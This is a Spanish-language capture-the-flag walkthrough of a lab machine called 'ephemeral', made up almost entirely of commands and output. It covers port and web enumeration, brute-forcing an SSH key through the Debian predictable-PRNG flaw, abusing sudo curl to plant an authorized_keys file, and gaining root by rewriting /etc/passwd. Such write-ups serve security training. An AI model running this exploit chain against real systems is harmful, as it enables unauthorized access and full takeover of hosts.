Comenzamos con la enumeración de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.33
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.33
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-13 10:37 -04
Nmap scan report for 192.168.1.33
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f0:f2:b8:e0:da:41:9b:96:3b:b6:2b:98:95:4c:67:60 (RSA)
| 256 a8:cd:e7:a7:0e:ce:62:86:35:96:02:43:9e:3e:9a:80 (ECDSA)
|_ 256 14:a7:57:a9:09:1a:7e:7e:ce:1e:91:f3:b1:1d:1b:fd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.59 secondsEnumeramos con gobuster:
❯ gobuster dir -u 'http://192.168.1.33' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/note.txt (Status: 200) [Size: 159]
/agency (Status: 200) [Size: 18726]
...El note.txt da la pista clave (claves generadas con OpenSSL):
Hey! I just generated your keys with OpenSSL. You should be able to use your private key now!
If you have any questions just email me at henry@ephemeral.comCon whatweb obtenemos un segundo usuario:
❯ whatweb http://192.168.1.33/agency/
http://192.168.1.33/agency/ [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[randy@ephemeral.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.1.33], JQuery[3.1.1], Script, Title[Agency Perfect], X-UA-Compatible[IE=edge]Tenemos randy y henry. La mención de OpenSSL apunta al fallo de PRNG predecible de Debian:
❯ searchsploit openssl ssh
...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...Descargamos las claves precomputadas y hacemos fuerza bruta de la clave de randy:
❯ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
❯ tar -xvf 5622.tar.bz2
❯ python2 5720.py rsa/2048/ 192.168.1.33 randy 22 5
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
...
Key Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671
Execute: ssh -lrandy -p22 -i rsa/2048//0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.1.33
Tested 20604 keys | Remaining 12164 keys | Aprox. Speed 15/secNos conectamos con la clave encontrada:
❯ cp rsa/2048//0028ca6d22c68ed0a1e3f6f79573100a-31671 ../content/id_rsa
❯ chmod 600 id_rsa
❯ ssh randy@192.168.1.33 -i id_rsa
randy@ephemeral:~$Para movernos a henry, revisamos sudo -l:
randy@ephemeral:~$ sudo -l
Matching Defaults entries for randy on ephemeral:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User randy may run the following commands on ephemeral:
(henry) NOPASSWD: /usr/bin/curlPodemos ejecutar curl como henry, que permite escribir archivos (file:// + -o). Colocamos nuestro authorized_keys en el home de henry:
randy@ephemeral:/tmp$ echo 'ssh-rsa ... > authorized_keys
randy@ephemeral:/home/henry$ sudo -u henry curl file:///tmp/authorized_keys -o /home/henry/.ssh/authorized_keys
❯ ssh henry@192.168.1.33 -i id_rsa_pwned
Enter passphrase for key 'id_rsa_pwned': 1234
henry@ephemeral:~$Obtenemos la primera flag. Para escalar a root, comprobamos que /etc/passwd es escribible (Writable Critical Files Privesc):
henry@ephemeral:~$ ls -l /etc/passwd
-rw-rw-r-- 1 root henry 2891 Jun 24 2022 /etc/passwdGeneramos un hash con openssl y reemplazamos la contraseña de root:
❯ openssl passwd -1
Password: 1234
Verifying - Password: 1234
$1$ZqQxvw4D$Q0ATKAkFL/5lzj0hUI1600
henry@ephemeral:~$ nano /etc/passwd
henry@ephemeral:~$ cat /etc/passwd
...
root:$1$ZqQxvw4D$Q0ATKAkFL/5lzj0hUI1600:0:0:root:/root:/bin/bash
...
henry@ephemeral:~$ su root
Password:
root@ephemeral:/home/henry#Obtenemos nuestra flag.
Fin.